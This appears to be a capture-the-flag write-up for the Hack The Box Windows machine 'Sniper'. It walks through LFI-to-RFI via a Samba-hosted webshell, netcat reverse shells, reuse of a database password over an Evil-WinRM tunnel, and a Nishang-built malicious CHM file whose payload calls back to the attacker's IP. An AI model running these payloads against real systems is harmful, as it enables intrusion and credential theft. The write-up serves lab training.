→ Sniper is another windows machine that you can access in unintended method. The PHP Web Application was supposed to be vulnerable into LFI or Local File Inclusion to RFI or Remote File Inclusion. Since this is a windows box I setup a samba share using the RFI method and I injecting my webshell and upload my executable file to get a reverse shell from my Kali Linux machine. Doing some Reconnaisance I see a file which has to be related to user credentials that need to convert into a plain text then execute it with the executable file i uploaded. The machine creator was leave a notes.txt on use file directory which is good enough as hint. Creating a malicious payload from my host using Powershell was not easy as my Windows always reject it and cannot load the script file but then I managed to create a malicious CHM file and get the Administrator.
Penetration Testing Methodologies
Network Scanning
→ Nmap scan
→ discover open ports and what services are running
Enumeration
→ Browsing the HTTP Service
→ Enumerate the SMB at port 445
→ Bruteforce the Web page directories
Post - Exploitation
→ Enumerate the page with Local File Inclusion
→ Setup SAMBA SHARE and upload a webshell
→ Using the access checked provided by the Microsoft to check the access rights of account "Chris"
→ Retrieve user credentials from Web page directories in inetpub
Exploitation
→ Method #1: Look at listening port that can use to Port Forwarding and Login as Chris using Evil-WinRM
→ Method #2: Convert the password hash into plaintext with Powershell and execute the nc.exe to get Reverse shell
→ Transfer to the Sniper machine in C:\Docs directories where the Administrator checked and open it.
→ Setup netcat listener and
→ Gain the Administrator shell
Network Scanning
Walkthrough
→ First, I run the NMAP to scan the target and get information about the various services that are running on the target machine. I use
-sV ⇒ Probe open ports to determine service/version info
-sC ⇒ equivalent to —script=default
-T 0-5 ⇒ Set timing template - higher is faster (less accurate)
-p- ⇒ Scan all 65535 ports
-oN ⇒ to save our scan results to a text file
# sh nmap -sV -sC -T4 -p- 10.10.10.151 -oN nmap-Sniper
# sh
root in htb/boxes/Sniper ❯ nmap -sV -sC -T4 -p- 10.10.10.151 -oN nmap-Sniper Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-26 23:52 PST Nmap scan report for 10.10.10.151 Host is up (0.22s latency). Not shown: 65530 filtered ports PORT STATE SERVICE VERSION 80/tcp open http Microsoft IIS httpd 10.0 | http-methods: |_ Potentially risky methods: TRACE |_http-server-header: Microsoft-IIS/10.0 |_http-title: Sniper Co. 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds? 49667/tcp open msrpc Microsoft Windows RPC Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 562.35 seconds
root in htb/boxes/Sniper took 9m22s ❯
Nmap results
So there’s port open.
80 ⇒ which basically hosted a Web page
135 ⇒ running as Windows RPC
139 ⇒ running on Windows Microsoft netbios-ssn
445 ⇒ which is a default port on SMB
49667 ⇒ running as Windows RPC too
Enumeration
The first thing I did is connect to machine with smbclient at port 445 and try anonymous login but it seems’ I am not allowed to do that.
# bash
root in htb/boxes/Sniper ❯ smbclient -L 10.10.10.151 -U "" Enter WORKGROUP\'s password: session setup failed: NT_STATUS_LOGON_FAILURE root in htb/boxes/Sniper took 3s ❯
Next, I use enum4linux – A Linux alternative to enum.exe for enumerating data from Windows and Samba hosts but not working too.
# sh
root in htb/boxes/Sniper ❯ enum4linux -o -U -G -S -P 10.10.10.151 Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Sat Mar 28 03:56:55 2020
========================== | Target Information | ========================== Target ........... 10.10.10.151 RID Range ........ 500-550,1000-1050 Username ......... '' Password ......... '' Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
==================================================== | Enumerating Workgroup/Domain on 10.10.10.151 | ==================================================== [E] Can't find workgroup/domain ===================================== | Session Check on 10.10.10.151 | ===================================== Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 437. [E] Server doesn't allow session using username '', password ''. Aborting remainder of tests.
root in htb/boxes/Sniper took 11s ❯
Scan Web page directories
So I will leave enumerating this machine for a while and try to enumerate what’s on the Web page. I use dirsearchWeb path scanner if i can get any usefull stuffs so
so there is login page which caught my attention at /user/login.php
I tried to input admin:admin for username and password and it redirects me into Under Construction Page.
I realized that this page is just a rabbit hole, can’t find any hints in the page source, so I try enumerate the whole page of sniper in http://10.10.10.151
Post - Exploitation
LFI | Local File Inclusion
After several enumeration in the web page’ I found interesting section at Services there’s a link there that you can use to change the language but what more interesting, it’s not like the other website that you can right click -> and change/translate the language. there’s a PHP File is assign to pick language for you.
when I try to inject a single ' in lang=blog-en.php it turn something like this’ seems to be it is vulnerable to LFI or Local File Inclusion attack
To confirm that this website is vulnerable to LFI I put this parameter at "lang=" ⇒ \windows\system32\drivers\etc\hosts
looking at at view page source we will see about the hosts file.
RFI | Remote File Inclusion
So I search on Google about LFI to RFI article and that one is pretty good. It help me to inject a webshell and get in to the machine.
I setup my SAMBA SHARE based on the article with this configuration at /etc/samba/smb.conf
# bash
[global] workgroup = WORKGROUP server string - Samba Server %v netbios name = Payas0 security = user map to guest = bad user name to resolve order = bcast host dns proxy = no bind interfaces only = yes
[medz] path = /root/htb/boxes/Sniper/ writable = no guest ok = yes guest only = yes read only = yes directory mode = 0555 force user = nobody
Now everything looks fine i restart my samba share and do the RFI method. To take control the web I use Winter WebShell so I can upload my payload and execute a revershell, so i will now put my IP address at lang=\\10.10.14.216\medz\shell.php then make a custom directory at C:
# bash
service smbd restart
Create folder named – payas0
Looks good ! then i will upload nc.exe at C:\payas0
Now everything is set i will execute nc.exe with my IP and Port at 9001 and popup Powershell
root in htb/boxes/Sniper via 🐘 v7.3.15 ❯ nc -lnvp 9001 listening on [any] 9001 ... connect to [10.10.14.216] from (UNKNOWN) [10.10.10.151] 50340 Windows PowerShell Copyright (C) Microsoft Corporation. All rights reserved.
Second I visit the inetpub directory where the website is installed and the source code. and I’m lucky i see interesting file at C:\inetpub\wwwroot\user\db.php which contain user credentials.
The DB connection String was found at the db.php was confirmed that the creds is owned by user Chris
Exploitation
Privilege Escalation for user CHRIS
Method #1
I was thinking if I can use that creds in Evil-WinRM protocol(netstat -ano) and get the user.txt
We can use port 5985 to create the Port Forwarding method and login as Chris but before i do that I uploaded plink.exe windows binary to Sniper and create a tunnel so I can access that port from my machine so:
# powershell
PS C:\payas0> .\plink.exe -l nulldev -pw nulldev -R 5985:127.0.0.1:598510.10.14.216 .\plink.exe -l nulldev -pw nulldev -R 5985:127.0.0.1:598510.10.14.216 The server's host key isnot cached inthe registry. You have no guarantee thatthe server isthe computer you think itis. The server's rsa2 key fingerprint is: ssh-rsa 204881:c9:32:5d:2e:03:3c:1d:72:8a:54:45:ed:0b:08:4b If you trust this host, enter "y"to add the key to PuTTY's cache and carry on connecting. If you want to carry on connecting just once, without adding the key tothe cache, enter "n". If you do not trust this host, press Return to abandon the connection. Store key in cache? (y/n) y Linux Payas0 5.4.0-kali2-amd64 #1 SMP Debian 5.4.8-1kali1 (2020-01-06) x86_64
The programs included withthe Kali GNU/Linux system are free software; the exact distribution terms for each program are described inthe individual files in /usr/share/doc/*/copyright.
Kali GNU/Linux comes with ABSOLUTELY NO WARRANTY, tothe extent permitted by applicable law. Last login: Sat Mar 2805:30:422020from10.10.10.151 Could not chdir to home directory /home/nulldev: No such fileor directory
$ whoami whoami nulldev $ su root Password: "------------"
nulldev on Payas0 ❯
Now that the tunnel is created, I will try to login as user Chris using dbuser password and get the user.txt
# powershell
nulldev on Payas0 in evil-winrm on master via 💎 v2.5.7 ❯ ruby evil-winrm.rb -i 127.0.0.1 -u Chris -p '36mEAhz/B8xQ~2VM' -s ./ -e ./ ruby evil-winrm.rb -i 127.0.0.1 -u Chris -p '36mEAhz/B8xQ~2VM' -s ./ -e ./
Evil-WinRM shell v2.3
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Chris\Documents> cd ..
*Evil-WinRM* PS C:\Users> dir dir
Directory: C:\Users
Mode LastWriteTime Length Name ---- ------------- ------ ---- d----- 4/9/20196:47 AM Administrator d----- 4/11/20197:04 AM Chris d-r--- 4/9/20196:47 AM Public
*Evil-WinRM* PS C:\Users> cd Chris\Desktop cd Chris\Desktop *Evil-WinRM* PS C:\Users\Chris\Desktop> dir dir
Directory: C:\Users\Chris\Desktop
Mode LastWriteTime Length Name ---- ------------- ------ ---- -a---- 4/11/20198:15 AM 32 user.txt
*Evil-WinRM* PS C:\Users\Chris\Desktop> more user.txt more user.txt 21f4[----------------------]cf56e
*Evil-WinRM* PS C:\Users\Chris\Desktop>
Method #2
Yes there’s a method #2 to get user.txt and this is less hassle than doing port forwarding with powershell but first I will give permission my payas0 folder then setup netcat listener in my Kali nc -lnvp 4444 so:
After executing the last command I have now again the shell (2nd shell) and this was look better.
# powershell
root in htb/boxes/Sniper via 🐘 v7.3.15 ❯ nc -lnvp 4444 listening on [any] 4444 ... connect to [10.10.14.216] from (UNKNOWN) [10.10.10.151] 49835 Microsoft Windows [Version 10.0.17763.678] (c) 2018 Microsoft Corporation. All rights reserved.
Enumeration begins again’ but this was pretty easy as the the stuffs I needed is all in the basic folder directories. Going at C:\Docs directory there’s a note.txt leave by our “Boss” says.
# powershell
C:\Users\Chris\Desktop>cd \Docs cd \Docs C:\Docs>dir dir Volume in drive C has no label. Volume Serial Number is6A2B-2640
Directory of C:\Docs
03/28/202012:46 AM <DIR> . 03/28/202012:46 AM <DIR> .. 04/11/201909:31 AM 285 note.txt 04/11/201909:17 AM 552,607 php for dummies-trial.pdf 2 File(s) 552,892 bytes 2 Dir(s) 17,953,026,048 bytes free
Note.txt
What’s on the note.txt ? Well this:
# powershell
C:\Docs>more note.txt more note.txt Hi Chris, Your php skillz suck. Contact yamitenshi so that he teaches you how to use it and after that fix the website as there are a lot of bugs on it. And I hope that you've prepared the documentation for our new app. Drop it here when you're done with it.
Regards, Sniper CEO.
C:\Docs>
So hints is on the note ⇒ "The documentaion for the new app, then I will drop it here when I'm done with it." So there’s a file here here which the Administrator will checked and open it.
CHM File
Next, in the C:\Users\Chris\Downloads directory there’s a CHM file.
# powershell
C:\Docs>cd \Users\Chris\Downloads cd \Users\Chris\Downloads
C:\Users\Chris\Downloads\dir dir Volume in drive C has no label. Volume Serial Number is6A2B-2640
To view the chm file, you need to open it with Windows, so I transferred the chm file to my Windows machine, and it is precisely the documentation for the app, requested by the Sniper CEO:
Administrator will checked CHM and open it then the payload will triggered.
This one is new to me I have never had anything to do with CHM files’ so I did some research about CHM File and I found that you can create a malicious CHM File with Nishang and use the Out-CHM.ps1.
I try to download first the Out-CHM.ps1 in my Windows but it rejected because it is considered as a virus’. Well creating a malicious CHM File was fuck me’ as my Windows always deny it even i disable my windows security for a while, Powershell will always reject it.
# powershell
PS C:\Users\Medz\Documents\sniper> import-module Out-CHM.ps1 ..\Out-CHM.ps1 : The term 'Out-CHM.ps1'isnot recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, orif a path was included, verify that the path is correct andtry again. At line:1char:1 + ..\Out-CHM.ps1 + ~~~~~~~~~~~~~~ + CategoryInfo : ObjectNotFound: (Out-CHM.ps1:String) [], CommandNotFoundException + FullyQualifiedErrorId : CommandNotFoundException
PS C:\Users\Medz\Documents\sniper>
but I managed it too using powershell -ep bypass
# powershell
PS C:\Users\Medz\Documents\sniper> powershell -ep bypass Windows PowerShell Copyright (C) Microsoft Corporation. All rights reserved.
Try the new cross-platform PowerShell https://aka.ms/pscore6
PS C:\Users\Medz\Documents\sniper>
Now before generate a CHM file we need to download this first HTML Help Workshop from Microsoft and choose htmlhelp.exe (run/install it). This will create the folder C:\Program Files (x86)\HTML Help Workshop with the needed programs to create the malicious .chm file.
and Finally, I can now create CHM file.
# powershell
PS C:\Users\Medz\Documents\sniper> import-module .\Out-CHM.ps1 PS C:\Users\Medz\Documents\sniper> Out-CHM -Payload "C:\payas0\nc.exe 10.10.14.216 1234 -e cmd.exe" -HHCPath "C:\Program Files (x86)\HTML Help Workshop" Microsoft HTML Help Compiler 4.74.8702
Compiling c:\Users\Medz\Documents\sniper\doc.chm
Compile time: 0 minutes, 0 seconds 2 Topics 4 Local links 4 Internet links 0 Graphics
Created c:\Users\Medz\Documents\sniper\doc.chm, 13,448 bytes Compression increased file by280 bytes. PS C:\Users\Medz\Documents\sniper> dir
Directory: C:\Users\Medz\Documents\sniper
Mode LastWriteTime Length Name ---- ------------- ------ ---- d----- 6/30/201910:58 PM Basic Linux Privilege Escalation_files -a---- 6/30/201910:58 PM 56717 Basic Linux Privilege Escalation.html -a---- 3/29/20203:20 AM 13448 doc.chm -a---- 3/29/20203:05 AM 19502 Out-CHM.ps1
PS C:\Users\Medz\Documents\sniper>
Gain the Administrator Shell
So it’s done ! Now I will upload doc.chm in C:\Docs directory of SNIPER machine.
# powershell
C:\Docs>dir dir Volume in drive C has no label. Volume Serial Number is6A2B-2640
Directory of C:\Docs
03/28/202007:19 PM <DIR> . 03/28/202007:19 PM <DIR> .. 04/11/201909:31 AM 285 note.txt 04/11/201909:17 AM 552,607 php for dummies-trial.pdf 2 File(s) 552,892 bytes 2 Dir(s) 17,987,465,216 bytes free
Once we put the doc.chm file in Docs I simply setup netcat listener with my port i generated in malicious chm file. Now all i need to do is to wait the Administrator to checked and open it.
Root
After 2-3 minutes I have the administrator shell ! Very nice box !
# bash
root in htb/boxes/Sniper via 🐘 v7.3.15 ❯ nc -lnvp 1234 listening on [any] 1234 ... connect to [10.10.15.33] from (UNKNOWN) [10.10.10.151] 49703 Microsoft Windows [Version 10.0.17763.678] (c) 2018 Microsoft Corporation. All rights reserved.
